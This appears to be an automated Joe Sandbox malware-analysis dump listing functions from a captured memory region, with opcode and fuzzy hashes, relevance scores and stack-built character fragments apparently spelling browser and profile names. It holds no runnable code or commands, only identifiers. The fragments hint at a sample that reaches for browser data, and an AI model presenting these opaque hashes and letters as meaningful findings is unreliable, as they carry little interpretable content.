Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: t6
API String ID: 0-3308272532
Opcode ID: b97e63fa97dfd4fab72759ecb5855759069ac5de29b491765205d31d62668f27
Instruction ID: 3fd7519830f7b8cec55dec9f8ff0b006da79866e17aff5315cc60c489a773963
Opcode Fuzzy Hash: b97e63fa97dfd4fab72759ecb5855759069ac5de29b491765205d31d62668f27
Instruction Fuzzy Hash: E511FEB6D01219AF8B41DFE9DD409EEBBF8EF48210F04416AE919E7200E7715A048BA1

Function 03B4A804 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db026352704d956b45edde2cd5502e24b6c34fe67d224028f339beaced55abe3
Instruction ID: 2e4376dfce9a9bf304bf68703ee90008fd268e88cce89ec4c6e64e6af9d12368
Opcode Fuzzy Hash: db026352704d956b45edde2cd5502e24b6c34fe67d224028f339beaced55abe3
Instruction Fuzzy Hash: 894140B1D10219AFDB14CF99DC81AEEBBBCEF49B10F10416AF914E7241E3B09641CBA4

Function 03B6E3F6 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2fbd37c1c1b9a2b5c7b6cf900f28234490633356d6c4fa8364d6396a6edb64d
Instruction ID: 2fd9a6e321a0e7915e4f188f1420cff8088431e3615e626a5cfa875f1e6f59b0
Opcode Fuzzy Hash: c2fbd37c1c1b9a2b5c7b6cf900f28234490633356d6c4fa8364d6396a6edb64d
Instruction Fuzzy Hash: 252108B5A00208AFDB14DF58DC81EEF77A8EF89304F008559F958A7380D674A811CBA5

Function 03B5E7E6 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c89710dc2431aa18e435c93ebd3c77ec0eada744cc4b436dc0d274e51ef4b9c5
Instruction ID: ef0126cc1104b365d9bce2d0b7d93422608d358bac2e620ec3628817a98997f0
Opcode Fuzzy Hash: c89710dc2431aa18e435c93ebd3c77ec0eada744cc4b436dc0d274e51ef4b9c5
Instruction Fuzzy Hash: 331182B63803057BF720EA559C42FAB775CDB89B18F244065FF08AE2C1E6A4F91146B5

Function 03B6ED06 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79e6ce81019c3bf89b5d879145f585797b5959a69997a7c271fe31ae185d8423
Instruction ID: 0ff73ea4cc9ea35a91b3c12516fc776ec2321e00db296291872ac2765a88ff7b
Opcode Fuzzy Hash: 79e6ce81019c3bf89b5d879145f585797b5959a69997a7c271fe31ae185d8423
Instruction Fuzzy Hash: 91213AB5A00209AFDB20EF58DC81EAF77A8EF89304F004559FD18AB241E774A9118BA5

Function 03B6E216 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81a06def1ddef4256dd003bcb66fd7894a8cffa5989dfe196ff0b49f3487bdbd
Instruction ID: 0a692c426a1260301b26c0aca161a18c37c031480b9a472c5c27cd15ec980cbd
Opcode Fuzzy Hash: 81a06def1ddef4256dd003bcb66fd7894a8cffa5989dfe196ff0b49f3487bdbd
Instruction Fuzzy Hash: 4411A375A00304BBD720EF69DC45FAF73ACEF86614F004599F958AB281E674A901CBB5

Function 03B6B176 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f04ec7ce60a025d34a14b055fa20296c754ea373a28a400dd428094297d63bd
Instruction ID: a5eae3365d9c25132b8c233888361842083d29e46aad1c58850f9fe088d14df0
Opcode Fuzzy Hash: 2f04ec7ce60a025d34a14b055fa20296c754ea373a28a400dd428094297d63bd
Instruction Fuzzy Hash: 29111CB6D0121DAF8B40DFE9DC409EFBBF8EF48200F1441AAE919E7200E7745A048BA1

Function 03B6E0B6 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 573a65a4e3462d27482d41eda33c40d446f3448b8a8b7dafb8b05b413b01532c
Instruction ID: 6202c5eb9ce952d8799d65a10946a98090302ddbe991a37b0b172f3556e0cb3b
Opcode Fuzzy Hash: 573a65a4e3462d27482d41eda33c40d446f3448b8a8b7dafb8b05b413b01532c
Instruction Fuzzy Hash: CA115175A00344BBD720EF58DC45FAB73ACEF89714F004599FA18AB281E774A9118BA5

Function 03B4A9B6 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b2d3664bd4d64c0c02e499abd0e34a82afcb8ad3044b6195f3560757d5954c
Instruction ID: 6c5a3c688828d36efcf3b0dd4ec3c4d69b1e8f24c4fcac7758853764a3403df5
Opcode Fuzzy Hash: 98b2d3664bd4d64c0c02e499abd0e34a82afcb8ad3044b6195f3560757d5954c
Instruction Fuzzy Hash: AD017B325803568F83069F28DC84199BBF6FF8B32475841A6C0D78F2A0F331C0578781

Function 03B6F066 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6655bc26ada52425b2f276ad2bd3021ce3e4afd6508276e3c74694b17c355646
Instruction ID: f2ba289aad68cc8e1448347b2138ad0c7f81be4c7d1186a964ef2b8dbcfc9aa4
Opcode Fuzzy Hash: 6655bc26ada52425b2f276ad2bd3021ce3e4afd6508276e3c74694b17c355646
Instruction Fuzzy Hash: B501D6B6210208BFCB14DE89DC80EEB77ADAF8D754F408208BA09E7241D630FC518BA4

Function 03B4A94C Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84fac1961c06ad82dc6b34181f85ba94783fe518867c9d6fe4e3c8fc0595cfbc
Instruction ID: 8b09c9054f2b89fd151d9290b075c65e47ed43a6d978d5b46063c35eefbf4340
Opcode Fuzzy Hash: 84fac1961c06ad82dc6b34181f85ba94783fe518867c9d6fe4e3c8fc0595cfbc
Instruction Fuzzy Hash: 09F0597752020257D7108F7DAC40B86F79CEB48334F250272F89CDB241D631D01583A0

Function 03B6E306 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d3e6ff66e61f6d11fedc0ef2662d0c139e68518ccdb49ba55ec8c77a3222386
Instruction ID: f5a60f17753bdd720c501a93a9405af90dd8f6c7c093d53693f390ee56d1391a
Opcode Fuzzy Hash: 8d3e6ff66e61f6d11fedc0ef2662d0c139e68518ccdb49ba55ec8c77a3222386
Instruction Fuzzy Hash: 33F01C762002097BCB10EE99DC81EAB77ACEFCA654F008459FA18E7241D670B9128BB4

Function 03B6EF86 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f05c5da47d2a966b1a53bb4ab017d252cc4b594e74c13755620a5d52c4bf620
Instruction ID: cad3050e9ae86aee52d0987fabb72f261e833c6a296192c8e79bd8899222bda0
Opcode Fuzzy Hash: 9f05c5da47d2a966b1a53bb4ab017d252cc4b594e74c13755620a5d52c4bf620
Instruction Fuzzy Hash: 1EE06D762003087BD620EE98EC41EAB33ACEF89710F004458FA08A7241DA70B8118BB8

Function 03B5E906 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3854707082a802e21ca538c5ca595da032a453ab037b4599833429125612a83
Instruction ID: 9c50ddbd73d21648aefbd8ad99142b2b567e0f61e806fc81dfab215170ccd9aa
Opcode Fuzzy Hash: d3854707082a802e21ca538c5ca595da032a453ab037b4599833429125612a83
Instruction Fuzzy Hash: 6FF08275C15208EBDB24CF64D841BDEBBB8EB04324F1043A9F8699B2C0E63497518781

Function 03B70C26 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd0b9784ba5d9cab99fbd61dcac45c2b55c620d96ba1a918fa939058f455643b
Instruction ID: 76feb7e16a3cd05a7545e61f2ff5ca701e2c5a4d9f9e9a667bda570b7b9f2e71
Opcode Fuzzy Hash: dd0b9784ba5d9cab99fbd61dcac45c2b55c620d96ba1a918fa939058f455643b
Instruction Fuzzy Hash: 6AE0263B6003103BC220B1998C09FABB7ACCBC0E64F1900B5FE1C9B301E160A90182F0

Function 03B5E903 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c721774263bef5dddb395838fb0f21497447a6b606b1ffadee67e84593d62c02
Instruction ID: 6a72383733e4c68f38241b4f8b812d7562f5ff72ce3e571bc0928fbf3aeb59b7
Opcode Fuzzy Hash: c721774263bef5dddb395838fb0f21497447a6b606b1ffadee67e84593d62c02
Instruction Fuzzy Hash: 5BE03975915108EAEB18CF64E881BDEBB75EF44210F1043A9F819DB280D6399B549741

Function 03B6EC76 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f890ca3714386d65644240d92c6891899fbb3f79d9138dafabd0b0cdfca10ca
Instruction ID: c913297f980e99a6a605e3b98676e2ab34c8506742139c24dabbf04bdb01bdf7
Opcode Fuzzy Hash: 8f890ca3714386d65644240d92c6891899fbb3f79d9138dafabd0b0cdfca10ca
Instruction Fuzzy Hash: BAE046362003047BD220FA59DC00FAB7BACEBC6754F008469FA08AB282D671B9018BB5

Function 03B51BEA Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cb55964346d15facf3a47372d67e0384a89bb59c5d8e5a7f2598a3c842b3e20
Instruction ID: 7a9ba3daa7e69cc80f928578dba34119fa1923dad168a95d10c7d3511ac5082e
Opcode Fuzzy Hash: 4cb55964346d15facf3a47372d67e0384a89bb59c5d8e5a7f2598a3c842b3e20
Instruction Fuzzy Hash: F1A022B2800302BA8E28FEB082C02CF3382AB0F228B300CE0F0830C30B0C803C030822

Non-executed Functions

Function 03B5ABA9 Relevance: 51.4, Strings: 41, Instructions: 170COMMON

Download Yara Rule

Strings

)*+,, xrefs: 03B5ACDD
@@@@, xrefs: 03B5AD6E
@@@@, xrefs: 03B5AD67
@@@@, xrefs: 03B5AD28
@@@@, xrefs: 03B5AD8A
@@@@, xrefs: 03B5AD44
@@@@, xrefs: 03B5AD75
@@@@, xrefs: 03B5ACFB
%&'(, xrefs: 03B5ACD3
@@@@, xrefs: 03B5AD3D
-./0, xrefs: 03B5ACE7
@@@@, xrefs: 03B5AD2F
@@@@, xrefs: 03B5AD13
@@@@, xrefs: 03B5AD91
@@@@, xrefs: 03B5AD52
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@, xrefs: 03B5AE29
@@@@, xrefs: 03B5ADD7
@@@@, xrefs: 03B5ACAB
@@@@, xrefs: 03B5AD98
@@@@, xrefs: 03B5ADB4
123@, xrefs: 03B5ACF1
@@@@, xrefs: 03B5ADD0
@@@@, xrefs: 03B5AD21
@@@@, xrefs: 03B5ADA6
@@@@, xrefs: 03B5AD7C
@@@@, xrefs: 03B5AD60
@@@@, xrefs: 03B5AD59
@@@@, xrefs: 03B5ADDE
@@@@, xrefs: 03B5ADBB
@@@@, xrefs: 03B5AD9F
@@@@, xrefs: 03B5AD83
@@@@, xrefs: 03B5AD1A
@@@@, xrefs: 03B5AD36
@@@@, xrefs: 03B5ADC2
@@@@, xrefs: 03B5AD4B
@@@@, xrefs: 03B5ADC9
@@@@, xrefs: 03B5AD0C
!"#$, xrefs: 03B5ACC9
@@@@@@@@, xrefs: 03B5ADF5
@@@@, xrefs: 03B5AD05
@@@@, xrefs: 03B5ADAD

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
API String ID: 0-3248090998
Opcode ID: c4b232fd501d359640b259d1363f003f98dfb94b7278ed6275f08ddbb1ce87a3
Instruction ID: 6924da86bd4d3e541df8e806ad3cc9fcfb472154f3e1b2e4ae81e791cf69ebe2
Opcode Fuzzy Hash: c4b232fd501d359640b259d1363f003f98dfb94b7278ed6275f08ddbb1ce87a3
Instruction Fuzzy Hash: 25910FF08052998ECB118F55A5603DFBF71BB85204F1581E9D6AA7B243C3BE4E85DF90

Function 03B65C86 Relevance: 25.2, Strings: 20, Instructions: 247COMMON

Download Yara Rule

Strings

m, xrefs: 03B65D74
e, xrefs: 03B65D27
r, xrefs: 03B65D43
r, xrefs: 03B65D4A
x, xrefs: 03B65D35
2, xrefs: 03B65D97
o, xrefs: 03B65D6D
t, xrefs: 03B65D16
I, xrefs: 03B65D51
g, xrefs: 03B65D90
t, xrefs: 03B65D82
l, xrefs: 03B65D5F
I, xrefs: 03B65D0C
\, xrefs: 03B65D7B
r, xrefs: 03B65D20
r, xrefs: 03B65D89
t, xrefs: 03B65D58
, xrefs: 03B65D2E
l, xrefs: 03B65D3C
i, xrefs: 03B65D66

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
API String ID: 0-3236418099
Opcode ID: 0d54fd00bf0485482bc89c2c8fc66857dcbeaba3e1e3e79c425b58f7e332f216
Instruction ID: e6d56959d593b4d67964a3e9d4dc28d5edee2e6c28361de1f2bca3cdab7a1e30
Opcode Fuzzy Hash: 0d54fd00bf0485482bc89c2c8fc66857dcbeaba3e1e3e79c425b58f7e332f216
Instruction Fuzzy Hash: FA914FB5900318AAEB20EF949C85FEFB7BDEF45708F0441E9E508AA141EB755B84CF61

Function 03B616D6 Relevance: 16.4, Strings: 13, Instructions: 189COMMON

Download Yara Rule

Strings

x, xrefs: 03B61711
m, xrefs: 03B61776
e, xrefs: 03B6173E
, xrefs: 03B61730
o, xrefs: 03B61768
l, xrefs: 03B61784
i, xrefs: 03B61737
F, xrefs: 03B6177D
r, xrefs: 03B6176F
o, xrefs: 03B61745
., xrefs: 03B61707
P, xrefs: 03B61761
s, xrefs: 03B6178B

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: $.$F$P$e$i$l$m$o$o$r$s$x
API String ID: 0-392141074
Opcode ID: ac183d6d73ad6da66fddf927000e3d9d5eefa5453625f7e528eba833c434b745
Instruction ID: d95d45e30cf06d7c4d9e76441eb64bdf23e05a1b19ffbbc0141f2b5240628582
Opcode Fuzzy Hash: ac183d6d73ad6da66fddf927000e3d9d5eefa5453625f7e528eba833c434b745
Instruction Fuzzy Hash: DE7110B5D10318AADB25EF94CC81FEF777DBF08708F0441E9E619AA180EB7467488B95

Function 03B5CA21 Relevance: 15.2, Strings: 12, Instructions: 232COMMON

Download Yara Rule

Strings

", xrefs: 03B5CA8D
m, xrefs: 03B5CB73
o, xrefs: 03B5CB53
e, xrefs: 03B5CB87
., xrefs: 03B5CA74
", xrefs: 03B5CA94
P, xrefs: 03B5CB49
", xrefs: 03B5CA86
/, xrefs: 03B5CA9B
i, xrefs: 03B5CB7D
r, xrefs: 03B5CB69
x, xrefs: 03B5CA7B

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: "$"$"$.$/$P$e$i$m$o$r$x
API String ID: 0-2356907671
Opcode ID: 3eed5aed7b66dfa22045419d8581d7764661b1b659e4deb3b103df84aa6d6736
Instruction ID: 95fee87ab0f2ad909000e09dbf6db2e7ebdf4a44e6995cf7caa1e6dd741dd5a1
Opcode Fuzzy Hash: 3eed5aed7b66dfa22045419d8581d7764661b1b659e4deb3b103df84aa6d6736
Instruction Fuzzy Hash: DC8172B6C043186ADB51FBA48C84FEF73BDEF48718F0445E9B509AA180EA756748CF61

Function 03B558DF Relevance: 13.9, Strings: 11, Instructions: 115COMMON

Download Yara Rule

Strings

e, xrefs: 03B55936
D, xrefs: 03B5596C
x, xrefs: 03B5591A
n, xrefs: 03B5597A
i, xrefs: 03B55981
w, xrefs: 03B55973
e, xrefs: 03B5593D
\, xrefs: 03B55913
r, xrefs: 03B5592F
r, xrefs: 03B55928
l, xrefs: 03B55921

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: D$\$e$e$i$l$n$r$r$w$x
API String ID: 0-685823316
Opcode ID: c4b9a0b4a181f54c0ebaf4c9de8773f78d2b96dd1e97dc760c68074a09e51738
Instruction ID: a3a0f45fbc5cfed831cf4cfaa446598a9d4ff582b1aba92dbb0b1ba33209fce5
Opcode Fuzzy Hash: c4b9a0b4a181f54c0ebaf4c9de8773f78d2b96dd1e97dc760c68074a09e51738
Instruction Fuzzy Hash: BB41B675D40318AFDB10DFA4DC44FEEBBB9EF05708F1081ADFA14AA180DBB556448BA4

Function 03B66113 Relevance: 12.9, Strings: 10, Instructions: 354COMMON

Download Yara Rule

Strings

P, xrefs: 03B66198
s, xrefs: 03B6619F
:, xrefs: 03B66178
:, xrefs: 03B661BF
A, xrefs: 03B66183
I, xrefs: 03B66171
:, xrefs: 03B661A6
t, xrefs: 03B6618A
N, xrefs: 03B661B1
m, xrefs: 03B661B8

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: :$:$:$A$I$N$P$m$s$t
API String ID: 0-2304485323
Opcode ID: 4086b9786d4557cae38b0584b0a610c15806bd50f6f6580ee96afbca803dbe8a
Instruction ID: dd0dd9184ab06b554865641022191d8accaccd6420dff45c62d0b320c15ec329
Opcode Fuzzy Hash: 4086b9786d4557cae38b0584b0a610c15806bd50f6f6580ee96afbca803dbe8a
Instruction Fuzzy Hash: 6BD10AB5910309AFDB10EBE4CC80BEFB7F9FF48708F04456DE555AA140E7B8A9458BA1

Function 03B66116 Relevance: 12.7, Strings: 10, Instructions: 209COMMON

Download Yara Rule

Strings

P, xrefs: 03B66198
s, xrefs: 03B6619F
:, xrefs: 03B66178
:, xrefs: 03B661BF
A, xrefs: 03B66183
I, xrefs: 03B66171
:, xrefs: 03B661A6
t, xrefs: 03B6618A
N, xrefs: 03B661B1
m, xrefs: 03B661B8

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: :$:$:$A$I$N$P$m$s$t
API String ID: 0-2304485323
Opcode ID: 258728040cf3601d8b85a432d83d21123a92a92664fa379e78676a42584ca8e2
Instruction ID: dfa299f15d9c3931bd12d6478797d286cc6d127a06fbe1d1435b2294f955862f
Opcode Fuzzy Hash: 258728040cf3601d8b85a432d83d21123a92a92664fa379e78676a42584ca8e2
Instruction Fuzzy Hash: C781F9B5910308ABDB10EFE4CC81BEEB7F9FF48308F044569E515EB240E7B9A6458B65

Function 03B4DCE6 Relevance: 11.3, Strings: 9, Instructions: 40COMMON

Download Yara Rule

Strings

R, xrefs: 03B4DD10
;, xrefs: 03B4DD28
d, xrefs: 03B4DD34
B, xrefs: 03B4DD1C
G, xrefs: 03B4DCF4
', xrefs: 03B4DD00
7, xrefs: 03B4DCF0
., xrefs: 03B4DCFC
H, xrefs: 03B4DD18

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: '$.$7$;$B$G$H$R$d
API String ID: 0-2591810558
Opcode ID: 87064129088403a904d0f011e807ffec6a4acbc0c23debcfd9dc3d74ff6bf347
Instruction ID: a6263e5d441c85ab4cb6c8dda3850f07ce2c86a6b3e12ba01b672329cc746687
Opcode Fuzzy Hash: 87064129088403a904d0f011e807ffec6a4acbc0c23debcfd9dc3d74ff6bf347
Instruction Fuzzy Hash: 6111EA50D087CAD9DB12CBBC84086AEBF711F23228F4882D9D5E52B2D3C2794706D7A6

Function 03B68FD6 Relevance: 8.9, Strings: 7, Instructions: 115COMMON

Download Yara Rule

Strings

S, xrefs: 03B69054
e, xrefs: 03B69062
l, xrefs: 03B6904D
L, xrefs: 03B6903F
a, xrefs: 03B6905B
c, xrefs: 03B69046
\, xrefs: 03B69096

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: L$S$\$a$c$e$l
API String ID: 0-3322591375
Opcode ID: ba2d74c56002875bcb5f41558809c3d2c2dd255abd61031f4223edc68b16ce34
Instruction ID: d29b071a44aff321eb85d3c06114b393a939f9d85ec2e47562347a1399df6fd6
Opcode Fuzzy Hash: ba2d74c56002875bcb5f41558809c3d2c2dd255abd61031f4223edc68b16ce34
Instruction Fuzzy Hash: 95419672C10318AACB10EFA8DC84EEFB7B8EF48318F0542AAD91DA7201E77556418BD4

Function 03B614A7 Relevance: 7.7, Strings: 6, Instructions: 174COMMON

Download Yara Rule

Strings

F, xrefs: 03B61501
P, xrefs: 03B614E5
r, xrefs: 03B61508
f, xrefs: 03B6150F
T, xrefs: 03B614EC
x, xrefs: 03B61516

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: F$P$T$f$r$x
API String ID: 0-2523166886
Opcode ID: b793e2f11fe1e5f271499b961e03fb5d4ed9578599052e7a6f4541f120ee8171
Instruction ID: cfb37351512f017a84ce4c3244c5a9b8544b9e7b377b992628266add7dce93b4
Opcode Fuzzy Hash: b793e2f11fe1e5f271499b961e03fb5d4ed9578599052e7a6f4541f120ee8171
Instruction Fuzzy Hash: EE51D8B5800304ABD730DF68CC48BEBF7F8EF0434CF0845AAE5159A281D7789644CBA1

Function 03B4A567 Relevance: 7.6, Strings: 6, Instructions: 69COMMON

Download Yara Rule

Strings

{, xrefs: 03B4A6C6
NUK[, xrefs: 03B4A596
4([#, xrefs: 03B4A5F4
4([L, xrefs: 03B4A5D2
[8+., xrefs: 03B4A5B4
3/67, xrefs: 03B4A617

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches
